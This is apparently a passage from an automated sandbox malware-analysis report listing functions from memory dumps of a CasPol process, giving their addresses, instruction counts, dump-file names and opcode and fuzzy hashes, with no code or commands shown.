                                          Function 1D5F05DF Relevance: .0, Instructions: 43COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6671124542.000000001D5F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D5F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d5f0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 19c91918c2cf42c2358e72be4f2e7ffd00858f8beeab05ae1dfb2848b7924660
                                          • Instruction ID: 2d8eef811c86eba43f392170baf921064319249a7873f91e65a28e6ab2383d38
                                          • Opcode Fuzzy Hash: 19c91918c2cf42c2358e72be4f2e7ffd00858f8beeab05ae1dfb2848b7924660
                                          • Instruction Fuzzy Hash: F2F0A9B65097806FD7118F19EC40863FFB8EF86520709C59FFD498B652D225B804CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC6D3C Relevance: .0, Instructions: 37COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08f2defd31362852b5503050435fdd66d8a1ae8f37fb056a761a97d5763591e6
                                          • Instruction ID: 4c6ffad202e9c102074d286022b131e2ccad48b79e107b9019b46bcd08fd2054
                                          • Opcode Fuzzy Hash: 08f2defd31362852b5503050435fdd66d8a1ae8f37fb056a761a97d5763591e6
                                          • Instruction Fuzzy Hash: B2F0F072B005208BCB10BB7DEA9836CB7A1EBC4211F1145BDD99A93745DF315D258792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D5F2600 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6671124542.000000001D5F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D5F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d5f0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab2f1d11fa022fce7282f5c3d4ee44df493e3ac727bec4853af987db1eae9203
                                          • Instruction ID: 69458e81006258bf1b1dd5ddac70a1db4fd7a7608272619e122232cd1777ade3
                                          • Opcode Fuzzy Hash: ab2f1d11fa022fce7282f5c3d4ee44df493e3ac727bec4853af987db1eae9203
                                          • Instruction Fuzzy Hash: 00F01D35108685DFC306CF44D580B15FBA2FB89718F24CAADE9490B752C737D913DA82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D5F0606 Relevance: .0, Instructions: 27COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6671124542.000000001D5F0000.00000040.00000020.00020000.00000000.sdmp, Offset: 1D5F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d5f0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e9e76d1be63255463866a7507489c293ef3c65cc51775566fb0ec59054978a31
                                          • Instruction ID: 4349b12ecead27b53c86e7c1f4ec387473dece8be0f5a578eea94c469d819048
                                          • Opcode Fuzzy Hash: e9e76d1be63255463866a7507489c293ef3c65cc51775566fb0ec59054978a31
                                          • Instruction Fuzzy Hash: BEE092B66006009FD750CF0AED81452F7E4EF88630708C47FDC0D8B701E276B504CAA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC04D7 Relevance: .0, Instructions: 26COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: adea628a98edeb1cdd85989ef9325b848bdcf69b0716555b39656a37926d8dbf
                                          • Instruction ID: a03a7dcf62dd37621b078ec2461d37ebc9421a0e576ea569e7f3e9fc11c3185e
                                          • Opcode Fuzzy Hash: adea628a98edeb1cdd85989ef9325b848bdcf69b0716555b39656a37926d8dbf
                                          • Instruction Fuzzy Hash: 64E0653AF001049FCF01EBBCD49899DB3F1AFC8224720816AD50AEB200EE30AE118B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC5717 Relevance: .0, Instructions: 26COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 33c09d191346b99b4e0e915750f6e9f683dee1d8ff0d9727b6a24763caba87bc
                                          • Instruction ID: 759d1450faa1beef53868018226b0afaa3f239a92db38aa1a1dcfb51f0fa605c
                                          • Opcode Fuzzy Hash: 33c09d191346b99b4e0e915750f6e9f683dee1d8ff0d9727b6a24763caba87bc
                                          • Instruction Fuzzy Hash: F1E06D36F001049FCF00EBBCD09899DB3F1AFC86247108065D50AE7240EE30AE118B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00CC0F27 Relevance: .0, Instructions: 26COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6645954165.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cc0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8e483be1e1373ebe3ab7693399f753932e224717854fefdbd9212dca5009a1ea
                                          • Instruction ID: d0305558c9d3e4ff0cb016b80c59997163b65c1a34f5028702fb7d5e50e9823d
                                          • Opcode Fuzzy Hash: 8e483be1e1373ebe3ab7693399f753932e224717854fefdbd9212dca5009a1ea
                                          • Instruction Fuzzy Hash: 40E06D36F001049FCF00EBFCD09899DB3F1AFC82657208066E50AEB310EE30AE118B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1FCD3A67 Relevance: .0, Instructions: 26COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6696999493.000000001FCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FCD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fcd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9daad87de448f38b29335ca6a83270918046acf313b4743cf27e689bd2e5b09f
                                          • Instruction ID: 92aa1561b2fca63a088dcd0d2c230cf69fb2fc1b23ea5e51ed00abb6be9e44c8
                                          • Opcode Fuzzy Hash: 9daad87de448f38b29335ca6a83270918046acf313b4743cf27e689bd2e5b09f
                                          • Instruction Fuzzy Hash: B8E0D8B25403046FE3508E06AC85F13FBA8DF84930F04C567FE081B342E17275148AE6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D4523F4 Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669196294.000000001D452000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D452000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d452000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 783465311bba8eb9dd0f69387c7c40545e3a9985879341002ec5dc4a0d1870f5
                                          • Instruction ID: 38d410fd6cb0cbb1ee4ba39f978f47c3eb7082b55a08f2073da7398c42aacf53
                                          • Opcode Fuzzy Hash: 783465311bba8eb9dd0f69387c7c40545e3a9985879341002ec5dc4a0d1870f5
                                          • Instruction Fuzzy Hash: 00D05E796057914FD3028A18C2E4FA937A4AF53714F5644FAA8409B773C768E581D602
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1D4523BC Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6669196294.000000001D452000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D452000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1d452000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 103845257b1075c186bf513b11d32fbb745b527a3136c1d265613fe37132832d
                                          • Instruction ID: aaa377bbbe0ef3fb285accb3315dfbefcbe57ab0081cda814e87f27c080341eb
                                          • Opcode Fuzzy Hash: 103845257b1075c186bf513b11d32fbb745b527a3136c1d265613fe37132832d
                                          • Instruction Fuzzy Hash: 78D05E347002854FD711CA28C2D0F6933E4AF44700F1244E9BC018F362C7A8E8C0D601
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00CD4500 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646271339.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_cd0000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,QIs$,QIs
                                          • API String ID: 0-470405259
                                          • Opcode ID: e230e30a25e6f94a95cda889311f923707b15df7d312624600c20fbd664475f5
                                          • Instruction ID: 6302d74555601de4e75ebf0306e04438fb7f2f2031913b9a875bfadc27c4fb2e
                                          • Opcode Fuzzy Hash: e230e30a25e6f94a95cda889311f923707b15df7d312624600c20fbd664475f5
                                          • Instruction Fuzzy Hash: 14C1C375A002058FDB28CF68C880AAEB7F6EF86310F16852BE656DB351DB34ED45C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00DAC180 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.6646838713.0000000000D90000.00000040.00000400.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_d90000_CasPol.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,J'
                                          • API String ID: 0-3046419478
                                          • Opcode ID: ccef05f644db410ac36b7d160bbdbe3f0c84fb101dec929accb1e3c37877ad51
                                          • Instruction ID: ec8c704458af6c5bbaab70d6b2288d0069404035bc97fe2bd06999081113bdd2
                                          • Opcode Fuzzy Hash: ccef05f644db410ac36b7d160bbdbe3f0c84fb101dec929accb1e3c37877ad51
                                          • Instruction Fuzzy Hash: F8411C397103079BDF685A3845F57A722E2EF52290F99D17FDCC7CB2A5DB25C8888212
                                          Uniqueness

                                          Uniqueness Score: -1.00%